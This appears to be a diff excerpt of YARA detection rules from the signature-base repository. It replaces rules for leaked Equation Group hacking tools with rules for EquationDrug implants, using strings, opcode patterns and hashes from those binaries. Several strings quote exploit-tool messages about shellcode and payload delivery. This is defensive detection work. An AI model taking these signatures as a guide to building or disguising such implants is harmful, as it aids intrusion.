+		$s1 = "Extended Memory Runtime Process" fullword wide
+		$s2 = "memess.exe" fullword wide
+		$s3 = "\\\\.\\%hs" fullword ascii
+		$s4 = ".?AVOpenSocket@@" fullword ascii
+		$s5 = "Corporation. All rights reserved." fullword wide
+		$s6 = "itanium" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Morerats_Client_Store : FILE
+rule SIGNATURE_BASE_Equationgroup_Processinfo_Implant : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file processinfo_Implant.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "de6de983-fad2-58cf-95be-57109436d5fc"
-		date = "2017-04-09"
+		id = "b110d819-2298-507b-91bb-2787bb11322e"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1417-L1433"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1543-L1558"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "34dc21d933d56b6f6c342ca110d9cff7bb51d9fd1b88b359861e5b5650679ad0"
+		logic_hash = "b0aace3c6fa20c5bb238264b2aa484d548945a4c2ccb65482cce71427f061604"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "619944358bc0e1faffd652b6af0600de055c5e7f1f1d91a8051ed9adf5a5b465"
+		hash1 = "aadfa0b1aec4456b10e4fb82f5cfa918dbf4e87d19a02bcc576ac499dda0fb68"
 
 	strings:
-		$s1 = "[-] Failed to mmap file: %s" fullword ascii
-		$s2 = "[-] can not NULL terminate input data" fullword ascii
-		$s3 = "Missing argument for `-x'." fullword ascii
-		$s4 = "[!] Value has size of 0!" fullword ascii
+		$s1 = "hZwOpenProcessToken" fullword ascii
+		$s2 = "hNtQueryInformationProcess" fullword ascii
+		$s3 = "No mapping" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 60KB and 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Watcher_Linux_X86_64_V_3_3_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_2 : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4077242e-a0f2-54a8-afad-f52b8ed874ba"
-		date = "2017-04-09"
+		description = "EquationGroup Malware - file PortMap_Implant.dll"
+		author = "Auto Generated"
+		id = "662ee1cf-b837-5362-84a8-1af7335d5e1b"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1435-L1450"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1560-L1574"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "be2ca3791ef1025db6a1dd6bcdf1a9f0b224c3f7585af4546029840251c50094"
+		logic_hash = "fcbc518d23dc21d482abcac29505c5404fc9e309554ca7dc9f1014adbff83e1a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a8d65593f6296d6d06230bcede53b9152842f1eee56a2a72b0a88c4f463a09c3"
+		hash1 = "964762416840738b1235ed4ae479a4b117b8cdcc762a6737e83bc2062c0cf236"
 
 	strings:
-		$s1 = "forceprismheader" fullword ascii
-		$s2 = "invalid option `" fullword ascii
-		$s3 = "forceprism" fullword ascii
+		$op1 = { 0c 2b ca 8a 04 11 3a 02 75 01 47 42 4e 75 f4 8b }
+		$op2 = { 14 83 c1 05 80 39 85 75 0c 80 79 01 c0 75 06 80 }
+		$op3 = { eb 3d 83 c0 06 33 f6 80 38 ff 75 2c 80 78 01 15 }
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 900KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 250KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Linux_Exactchange : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Ntevt : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file ntevt.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cd9487be-57c5-5352-bce7-f9510166182d"
-		date = "2017-04-09"
+		id = "36d23adb-dafe-5e99-8976-b146ceca2f9b"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1452-L1472"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1577-L1591"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a0bcf5aa1f434fe9698a7408df68870d4908cdf87f22bb4acfedc50bb2c8f11f"
+		logic_hash = "c5259c89dfedc34ca032775bda4ead04985da6b3d042b8a6635f5f848570d8c6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
-		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
-		hash3 = "39d4f83c7e64f5b89df9851bdba917cf73a3449920a6925b6cd379f2fdec2a8b"
-		hash4 = "15e12c1c27304e4a68a268e392be4972f7c6edf3d4d387e5b7d2ed77a5b43c2c"
+		hash1 = "45e5e1ea3456d7852f5c610c7f4447776b9f15b56df7e3a53d57996123e0cebf"
 
 	strings:
-		$x1 = "[+] looking for vulnerable socket" fullword ascii
-		$x2 = "can't use 32-bit exploit on 64-bit target" fullword ascii
-		$x3 = "[+] %s socket ready, exploiting..." fullword ascii
-		$x4 = "[!] nothing looks vulnerable, trying everything" fullword ascii
+		$s1 = "ntevt.sys" fullword ascii
+		$s2 = "c:\\ntevt.pdb" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 2000KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 500KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_X86_Linux_Exactchange : FILE
+rule SIGNATURE_BASE_Equationgroup_Nethide_Implant : FILE
 {
 	meta:
-		description = "Equation Group hack tool set"
+		description = "EquationGroup Malware - file nethide_Implant.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b39e0c6e-b427-5085-99f8-88b2e00bb110"
-		date = "2017-04-09"
-		modified = "2023-12-05"
-		reference = "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1474-L1490"
+		id = "36559b69-1718-5d9b-8d6f-3db4becba0c4"
+		date = "2017-01-13"
+		modified = "2023-01-27"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1593-L1608"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9365eb74a364eb83150672919ea1abe635465fe3239fff26ba91037c74971466"
+		logic_hash = "bd25d05b001ac7d41e60270b62aeecd520a570e76557c68d78d9680c7beb90ab"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dfecaf5b85309de637b84a686dd5d2fca9c429e8285b7147ae4213c1f49d39e6"
-		hash2 = "6ef6b7ec1f1271503957cf10bb6b1bfcedb872d2de3649f225cf1d22da658bec"
+		hash1 = "b2daf9058fdc5e2affd5a409aebb90343ddde4239331d3de8edabeafdb3a48fa"
 
 	strings:
-		$x1 = "kernel has 4G/4G split, not exploitable" fullword ascii
-		$x2 = "[+] kernel stack size is %d" fullword ascii
+		$s1 = "\\\\.\\dlcndi" fullword ascii
+		$s2 = "s\\drivers\\" wide
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 1000KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Eclipsedwing_Rpcproxy_Pcdlllauncher : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_4 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "8dd15424-e1b5-5543-97d5-3b3a83faa428"
-		date = "2017-04-15"
+		description = "EquationGroup Malware - file PC_Level4_flav_dll"
+		author = "Auto Generated"
+		id = "e3fc376b-f7cc-5dfa-bcf4-4991962a4cf9"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1502-L1519"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1610-L1624"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8a01ea872c161521301182b922ece893f9ad1a33d902ec94963946f3b07d7266"
+		logic_hash = "3046cbfa4b4f5eb5d0efc1b2b658567391b0c219650437088a0d6c179e9235fb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "48251fb89c510fb3efa14c4b5b546fbde918ed8bb25f041a801e3874bd4f60f8"
-		hash2 = "237c22f4d43fdacfcbd6e1b5f1c71578279b7b06ea8e512b4b6b50f10e8ccf10"
-		hash3 = "79a584c127ac6a5e96f02a9c5288043ceb7445de2840b608fc99b55cf86507ed"
+		hash1 = "227faeb770ba538fb85692b3dfcd00f76a0a5205d1594bd0969a1e535ee90ee1"
 
 	strings:
-		$x1 = "[-] Failed to Prepare Payload!" fullword ascii
-		$x2 = "ShellcodeStartOffset" fullword ascii
-		$x3 = "[*] Waiting for AuthCode from exploit" fullword ascii
+		$op1 = { 11 8b da 23 df 8d 1c 9e c1 fb 02 33 da 23 df 33 }
+		$op2 = { c3 0c 57 8b 3b eb 27 8b f7 83 7e 08 00 8b 3f 74 }
+		$op3 = { 00 0f b7 5e 14 8d 5c 33 18 8b c3 2b 45 08 50 ff }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Explodingcantouch_1_2_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Tdi6 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file tdi6.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "66a09bfc-992d-5152-9fd6-9d7bcfb8b92f"
-		date = "2017-04-15"
+		id = "c6dbc28a-ec52-5256-afff-ab15ed1b90a6"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1521-L1536"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1626-L1642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9239a61e71c86fc239f75baa9c781da18553e3c502495ad7429eaf3c744e870c"
+		logic_hash = "ba7e14a3bf158795ecee498976847fbbcc80635799be4574f05aa80d1a85a4ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0cdde7472b077610d0068aa7e9035da89fe5d435549749707cae24495c8d8444"
+		hash1 = "12c082f74c0916a0e926488642236de3a12072a18d29c97bead15bb301f4b3f8"
 
 	strings:
-		$x1 = "[-] Connection closed by remote host (TCP Ack/Fin)" fullword ascii
-		$s2 = "[!]Warning: Error on first request - path size may actually be larger than indicated." fullword ascii
-		$s4 = "<http://%s/%s> (Not <locktoken:write1>) <http://%s/>" fullword ascii
+		$s1 = "tdi6.sys" fullword wide
+		$s3 = "TDI IPv6 Wrapper" fullword wide
+		$s5 = "Corporation. All rights reserved." fullword wide
+		$s6 = "FailAction" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Architouch_1_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Modifyauthentication_Implant : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file modifyAuthentication_Implant.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c5af05b5-9dfa-535f-b9ea-c82ef79bae7e"
-		date = "2017-04-15"
+		id = "990035c5-cd9c-59e0-b244-e2caafd2561f"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1538-L1551"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1644-L1661"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cb6959b7b50e6f2895bab5f3355bef836c9a9774285cfb5fea339ce3d2c67f73"
+		logic_hash = "8bdc4c9e9a3e327bb55781670d8f373d5a8904ccd47cc4b67673c47a76c54927"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "444979a2387530c8fbbc5ddb075b15d6a4717c3435859955f37ebc0f40a4addc"
+		hash1 = "e1dff24af5bfc991dca21b4e3a19ffbc069176d674179eef691afc6b1ac6f805"
 
 	strings:
-		$s1 = "[+] Target is %s" fullword ascii
+		$s1 = "LSASS.EXE" fullword wide
+		$s2 = "hsamsrv.dll" fullword ascii
+		$s3 = "hZwOpenProcess" fullword ascii
+		$s4 = "hOpenProcess" fullword ascii
+		$s5 = ".?AVFeFinallyFailure@@" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgopher_1_0_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Ntfltmgr : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file ntfltmgr.sys"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1a3fe877-b9ae-50e4-bb1a-c9dcd4d4a657"
-		date = "2017-04-15"
+		id = "dd7fd371-a097-5df5-9ffd-89babbadee96"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1553-L1569"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1663-L1679"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b099bd202a962e64cb4f417eb7e09893b869e950eb0740394d222e8b4b89283"
+		logic_hash = "3e931088f363c7dfb6057019faf9e5c674c90f6bdae6211dcc871464b410efd3"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3d11fe89ffa14f267391bc539e6808d600e465955ddb854201a1f31a9ded4052"
+		hash1 = "f7a886ee10ee6f9c6be48c20f370514be62a3fd2da828b0dff44ff3d485ff5c5"
 
 	strings:
-		$x1 = "[-] Error appending shellcode buffer" fullword ascii
-		$x2 = "[-] Shellcode is too big" fullword ascii
-		$x3 = "[+] Exploit Payload Sent!" fullword ascii
-		$x4 = "[+] Bound to Dimsvc, sending exploit request to opnum 29" fullword ascii
+		$s1 = "ntfltmgr.sys" fullword wide
+		$s2 = "ntfltmgr.pdb" fullword ascii
+		$s4 = "Network Filter Manager" fullword wide
+		$s5 = "Corporation. All rights reserved." fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Esteemaudit_2_1_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_DXGHLP16 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file DXGHLP16.SYS"
 		author = "Florian Roth (Nextron Systems)"
-		id = "95594756-1872-5d86-877f-0977bd3c067b"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1571-L1585"
+		id = "d9e39c22-f606-5d9c-a5e2-e536b8566595"
+		date = "2017-01-13"
+		modified = "2023-01-06"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1681-L1702"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "272d435758c0021bfd84d84c00eb05ece2461a39d092693b61d362365ab098cd"
+		logic_hash = "5244cef876af4c0c02109599e6250254c854ed5c9bd2d0ccc44676dca21a1650"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "61f98b12c52739647326e219a1cf99b5440ca56db3b6177ea9db4e3b853c6ea6"
+		hash1 = "fcfb56fa79d2383d34c471ef439314edc2239d632a880aa2de3cea430f6b5665"
 
 	strings:
-		$x1 = "[+] Connected to target %s:%d" fullword ascii
-		$x2 = "[-] build_exploit_run_x64():" fullword ascii
+		$s1 = "DXGHLP16.SYS" fullword wide
+		$s2 = "P16.SYS" fullword ascii
+		$s3 = "\\Registry\\User\\CurrentUser\\" wide
+		$s4 = "\\DosDevices\\%ws" wide
+		$s5 = "\\Device\\%ws_%ws" wide
+		$s6 = "ct@SYS\\DXGHLP16.dbg" fullword ascii
+		$s7 = "%ws%03d%ws%wZ" fullword wide
+		$s8 = "TCP/IP driver" fullword wide
+		$s9 = "\\Device\\%ws" wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Darkpulsar_1_1_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Msgkd : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file msgkd.ex_"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0f4f77d7-99bc-5c84-84bf-877c4e79c9f0"
-		date = "2017-04-15"
+		id = "41019119-9bf4-5a45-b74b-f75ab7738821"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1587-L1601"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1704-L1718"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da8e1723da9e2d9955a3042bceb313d7d10903bfc078ba090c1c5a57be243b96"
+		logic_hash = "60336294ef5fa0221fc6a0e8b05bb279ac0e167024568cd9efa78e678e763704"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b439ed18262aec387984184e86bfdb31ca501172b1c066398f8c56d128ba855a"
+		hash1 = "25eec68fc9f0d8d1b5d72c9eae7bee29035918e9dcbeab13e276dec4b2ad2a56"
 
 	strings:
-		$x1 = "[%s] - Error upgraded DLL architecture does not match target architecture (0x%x)" fullword ascii
-		$x2 = "[%s] - Error building DLL loading shellcode" fullword ascii
+		$s1 = "KEysud" fullword ascii
+		$s2 = "XWWWPWS" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Educatedscholar_1_0_0 : FILE
+rule SIGNATURE_BASE_Equationgroup_Runaschild_Lp : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file RunAsChild_Lp.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "37ca8de5-435b-5c1a-83b8-5704fa137604"
-		date = "2017-04-15"
+		id = "f0623c3f-3a49-5cdf-89ea-2b3273fd8324"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1603-L1617"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1720-L1735"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0265ce5dfb5697a0610a6023b75f6e3ef2ef0308f639978a8617337df2e16c77"
+		logic_hash = "77bea554ead64f85f4efdc49f91ea3b24d1759ae9d91718d443938ab862b0191"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4cce9e39c376f67c16df3bcd69efd9b7472c3b478e2e5ef347e1410f1105c38d"
+		hash1 = "1097e1d562341858e241f1f67788534c0e340a2dc2e75237d57e3f473e024464"
 
 	strings:
-		$x1 = "[+] Shellcode Callback %s:%d" fullword ascii
-		$x2 = "[+] Exploiting Target" fullword ascii
+		$s1 = "Privilege elevation failed" fullword wide
+		$s2 = "Unable to open parent process" fullword wide
+		$s4 = "Invalid input to lpRunAsChildPPC" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Doublepulsar_1_3_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Equationdrug_Gen_6 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file PC_Level3_dll_x64"
 		author = "Florian Roth (Nextron Systems)"
-		id = "99711157-58eb-5ec0-bb9f-bf953cd10125"
-		date = "2017-04-15"
+		id = "99b2fab0-1298-5d48-a78b-eb59942ecfca"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1619-L1634"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1737-L1752"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b7ed9dbd4312541bd4d939602f63ce1d909729cce1845b018be6a07a9cb7fe2"
+		logic_hash = "5a14bd8efe2cf68beec207e5deec28fd5b9d89c506593214eccbceae3cb862a7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13"
+		hash1 = "339855618fb3ef53987b8c14a61bd4519b2616e766149e0c21cbd7cbe7a632c9"
 
 	strings:
-		$x1 = "[+] Ping returned Target architecture: %s - XOR Key: 0x%08X" fullword ascii
-		$x2 = "[.] Sending shellcode to inject DLL" fullword ascii
-		$x3 = "[-] Error setting ShellcodeFile name" fullword ascii
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s3 = "Copyright (C) Microsoft" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Erraticgophertouch_1_0_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_PC_Level3_Http_Flav_Dll_X64 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "EquationGroup Malware - file PC_Level3_http_flav_dll_x64"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9f03a4b6-69ab-5cef-876c-1e86ef2afe10"
-		date = "2017-04-15"
+		id = "93a3d47d-1dac-5621-8e69-d6d23b7628db"
+		date = "2017-01-13"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L1636-L1651"
+		reference = "https://goo.gl/tcSoiJ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp.yar#L1754-L1771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "08646f7887daddd8efac875bc7b111df7a52feae0a4b81bfd2d2ae7ef9453b5e"
+		logic_hash = "b304cb747e609ad5de46624e2d0d005d5f8521e16f0b36cab31535709d7ab72f"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "729eacf20fe71bd74e57a6b829b45113c5d45003933118b53835779f0b049bad"
+		hash1 = "4e0209b4f5990148f5d6dee47dbc7021bf78a782b85cef4d6c8be22d698b884f"
 
 	strings:
-		$x1 = "[-] Unable to connect to broswer named pipe, target is NOT vulnerable" fullword ascii
-		$x2 = "[-] Unable to bind to Dimsvc RPC syntax, target is NOT vulnerable" fullword ascii
-		$x3 = "[+] Bound to Dimsvc, target IS vulnerable" fullword ascii
+		$s1 = "Psxssdll.dll" fullword wide
+		$s2 = "Posix Server Dll" fullword wide
+		$s3 = ".?AVOpenSocket@@" fullword ascii
